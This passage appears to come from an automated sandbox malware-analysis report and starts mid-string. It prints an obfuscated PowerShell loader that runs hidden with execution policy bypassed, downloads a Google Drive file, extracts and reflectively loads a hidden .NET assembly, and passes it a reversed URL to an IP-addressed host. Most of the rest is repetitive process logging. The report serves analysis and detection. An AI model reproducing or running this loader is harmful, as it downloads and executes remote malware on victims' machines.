dmvydf06okzyb21cyxnlnjrtdhjpbmcoanznymfzzty0umv2zxjzzwqpo2p2twxvywrlzefzc2vtymx5iccrjz0gw1n5jysnc3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchqdk1jb21tyw5kqnl0zxmpo2p2txzhau1ldghvzca9iftkbmxpyi5jty5ib21lxscrjy5hzxrnzxrob2qnkycodunivkfjdunikttqdk12ywlnzxrob2qusw52b2tlkgp2tw51bgwsieaodunidhh0licrj0dst0wnkydmlzy2lze1ms44nzeunjquodkxlycrjy86chr0ahvdjysnyiwgdunizgvzyxrpdmfkb3vdyiwgdunizgvzyscrj3rpdmfkb3vdyiwgdunizgvzyxrpdmfkb3vdyicrjywgduniyxnwbicrj2unkyd0x3jlz2jyb3dzzxjzdunilcb1q2jkzxnhdgl2ywrvdunilcb1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyxrpdmfkb3vdyix1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyscrj3rpdmfkb3vdyix1q2ixdunilhvdymrlc2f0axzhzg91q2ipktsnks5szxbsqwnlkcdqdk0nlcckjykuumvwbefjzsgndunijyxbc1ryaw5hxvtjagfsxtm5ks5szxbsqwnlkchby2hhul0xmtarw2noyvjdmte0k1tjagfsxty5ksxbc1ryaw5hxvtjagfsxteynckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $shellid[1]+$shellid[13]+'x') (('jvmimageurl = ucbhttps://drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur ucb;jvmwebclient = new-objec'+'t system.net.webclient;jvmimageb'+'yte'+'s = jvmwebclient.downloadda'+'ta(jvmimageurl);jvmimagetext = [system.text.encoding]::utf8.getstring(jvmimagebytes);jvmstartflag = ucb<<base64_start>>ucb;jvmend'+'flag = ucb<<base64_end>>ucb;jvmstartindex = jvmimagetext.indexof(jvmstartflag);jvmendindex = jvmimagetext'+'.indexof'+'(jvmendflag);jvmstartindex -ge 0 -and jvmendindex -gt jvmstartindex;jvmstartindex += jvmstartflag.length;jvmbase64length = jvmendi'+'ndex - jvmstartinde'+'x;jvmbase64command = jvmimagetext.substring(jvmstartindex, jvmbase64length);jvm'+'base64reversed = -join (jvmbase64command.tochararray('+') nre forea'+'ch-object { jvm_ })[-1..-(jvmbase64command.length)];jvmcommandbytes = [system.convert]::frombase64string(jvmbase64reversed);jvmloadedassembly '+'= [sy'+'stem.reflection.assembly]::load(jvmcommandbytes);jvmvaimethod = [dnlib.io.home]'+'.getmethod'+'(ucbvaiucb);jvmvaimethod.invoke(jvmnull, @(ucbtxt.'+'grol'+'l/66/151.871.64.891/'+'/:ptthuc'+'b, ucbdesativadoucb, ucbdesa'+'tivadoucb, ucbdesativadoucb'+', ucbaspn'+'e'+'t_regbrowsersucb, ucbdesativadoucb, ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesa'+'tivadoucb,ucb1ucb,ucbdesativadoucb));').replace('jvm','$').replace('ucb',[string][char]39).replace(([char]110+[char]114+[char]69),[string][char]124))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
